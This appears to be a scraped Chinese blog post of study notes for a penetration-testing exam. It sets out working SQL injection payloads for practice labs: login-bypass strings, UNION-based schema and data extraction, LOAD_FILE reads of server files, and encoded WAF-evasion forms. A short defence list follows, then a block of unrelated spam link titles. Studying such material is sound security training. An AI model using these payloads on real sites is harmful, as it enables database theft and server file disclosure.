当前位置: 首页 > news >正文

没有公司网站如何做推广少儿编程网

news 2025/11/1 7:01:14
没有公司网站如何做推广,少儿编程网,辽宁省工程招标网,打广告的平台🔐 一、基础注入知识点 什么是SQL注入? SQL注入(SQL Injection)是指攻击者通过构造恶意SQL语句,将其注入到Web应用程序的输入中,从而控制后台数据库服务器,达到信息泄露、数据篡改、越权操作等…

🔐 一、基础注入知识点

什么是SQL注入?

SQL注入(SQL Injection)是指攻击者通过构造恶意SQL语句,将其注入到Web应用程序的输入中,从而控制后台数据库服务器,达到信息泄露、数据篡改、越权操作等目的。

🧪 二、SQL注入模拟与分类总结

✅ 模拟1:登录绕过 / 万能密码

' OR 1=1 --

  • 原理:利用逻辑表达式永远为真 (1=1),绕过登录验证。

  • 用途:用于登录框、管理员后台等认证接口的绕过。

✅ 模拟2:信息收集类注入(基于UNION的注入)

  1. 注入点探测

    ?uuid=-1'+union+ALL+SELECT+'1','2','3','4','5','6

    • 检查返回字段数是否正确,判断注入点位置。

  2. 获取数据库名

    SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata

  3. 获取数据表名

    SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='wasjcms'

  4. 获取字段名

    SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='flag'

  5. 获取字段值

    SELECT flag FROM wasjcms.flag

✅ 模拟3:读取服务器敏感文件

UNION SELECT ..., LOAD_FILE('/var/www/html/key.flag'), ...

  • 函数LOAD_FILE(path) 可读取服务器文件内容(需满足条件如路径可读、权限开放)。

  • 风险:信息泄露、读取flag等敏感数据。

✅ 模拟4:数据库结构探测与读取数据

?id=0 UNION SELECT 1,2,GROUP_CONCAT(table_name),... FROM information_schema.tables WHERE table_schema=database()

  • 探测当前数据库的表结构

  • GROUP_CONCAT(...):合并多行数据为单行输出,便于查看。

?id=0 UNION SELECT ..., GROUP_CONCAT(flag) FROM cms.cms_flag

  • 实际读取指定表字段值

✅ 模拟5:编码绕过与路径文件读取

?id=0')%0bununionion%0bselect%0b1,2,3,load_file('/tmp/key.flag')%23

  • %0b 是 URL 编码的垂直制表符,用于绕过WAF或过滤器。

  • %23# 的URL编码,相当于注释符。

✅ 模拟6:精确信息提取

- 获取当前数据库
(SELECT database())
- 获取表名
SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE table_schema='php_test'
- 获取字段名
SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns WHERE table_name='users'
- 获取数据内容
SELECT GROUP_CONCAT(username,password) FROM php_test.users

📌 三、常用注入函数与技巧

类别用法/函数说明
绕过' OR 1=1 --登录认证绕过
信息合并GROUP_CONCAT()将多行字段合并
系统函数database(), now(), user()当前数据库/时间/用户
系统表information_schema.tables, columns, schemata探测数据库结构
文件读取LOAD_FILE()读取服务器文件
注释符--, #, /*...*/注释掉原SQL

🧱 四、防御建议

  1. 使用预编译语句(Prepared Statements / ORM)

  2. 对用户输入进行严格校验与转义

  3. 最小权限原则:数据库用户不要授予FILE, SUPER, GRANT, DROP权限

  4. 隐藏错误信息,不返回SQL异常到前端

  5. 部署WAF / IDS 等安全设备进行注入防护

pteSQL注入模拟1

万能密码' OR 1=1 -- 

pteSQL注入模拟2

找注入点

?uuid=-1'+union+ALL+SELECT+'1','2','3','4','5','6

数据库名 wasjcms

?uuid=-1'+UNION+ALL+SELECT+'1',(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+'<br>')+FROM+INFORMATION_SCHEMA.SCHEMATA),'3','4','5','6

表名 flag

?uuid=-1'+UNION+ALL+SELECT+'1',(SELECT+GROUP_CONCAT(table_name+SEPARATOR+'<br>')+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA='wasjcms'),'3','4','5','6

字段flag

?uuid=-1'+UNION+ALL+SELECT+'1',(SELECT+GROUP_CONCAT(column_name+SEPARATOR+'<br>')+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='flag'),'3','4','5','6

数据

?uuid=-1'+UNION+ALL+SELECT+'1',(SELECT+flag+FROM+wasjcms.flag),'3','4','5','6

pteSQL注入模拟3

union select 1,2,3,4,5,6,7,8,9,10,11,12,load_file('/var/www/html/key.flag'),14,15--+

pteSQL注入模拟4

联合查询

?id=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

?id=0 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--+

?id=0 union select 1,2,group_concat(convert(table_name using gbk)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()--+

?id=0 union select 1,2,group_concat(flag),4,5,6,7,8,9,10,11,12,13,14,15 from cms.cms_flag--+

pteSQL注入模拟5

?id=0')%0bununionion%0bselect%0b1,2,3,load_file('/tmp/key.flag')%23

pteSQL注入模拟6

 数据库名:

2','3',(SELECT database()),NOW()) -- 

表:

2',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables where table_schema='php_test'),'4',NOW()) -- 

列:

2',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns where table_schema='php_test' and table_name='users'),'4',NOW()) -- 
2',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.columns where table_schema='php_test' and table_name='articles'),'4',NOW()) -- 

值:

2','3',(SELECT GROUP_CONCAT(password) from php_test.users),NOW()) -- 

pteSQL注入模拟7

http://www.dtcms.com/a/552597.html

相关文章:

  • 大连企业网站设计欣赏网络销售公司产品推广方案
  • 网站首页幻灯片代码个人网站建立
  • 礼县住房和城乡建设局网站舟山外贸营销网站建站
  • 网站软件定制开发公司十大不收费看盘软件排名
  • 哪些网站做免费送东西的广告6沈阳网下载
  • 网站首页设计制作教程温州做网站seo
  • 购物商城网站开发目的文档深圳电器公司招聘
  • 网站大数据怎么做的网上商城网站 找什么做
  • 设建网站贵州最新消息今天
  • 五金外贸网站模板全球最大的平面设计网站
  • 现代郑州网站建设自贡建设能源开发有限公司网站
  • 海南景区网站建设方案wordpress 文章连续
  • 网站建设怎么添加背景音乐有空间域名服务器怎么做网站
  • 广东模板网站建设报价企业网站的建设怎么收费
  • 站长工具域名电商网站成品案例
  • 冬创网站建设培训中心批量 发布 wordpress
  • 网站制作应用网站制作系统哪个好
  • 有关网站建设的外文文献沈阳单页网站制作
  • 网页设计与制作题库及答案360搜索引擎优化
  • 咖啡厅网站开发目标手机版wordpress怎么用
  • 桂阳网站设计盖县网站开发
  • 做网站负责人风险广州seo优化推广
  • 施坦威网站关于我们太阳能灯网站建设
  • 网站建设时间安排表网站备案后有什么好处
  • 微信做引流网站南宁网站建设蓝云
  • 网站基本模块软件开发培训机构怎么鉴定好坏
  • 常州网站排名优化桐城市美丽乡村建设专题网站
  • 如何用魔方网表做门户网站国家企业信用公示官方
  • 深圳罗湖做网站公司哪家好局域网网页制作
  • 免费的黄金网站有哪些如何做网站需求表格清单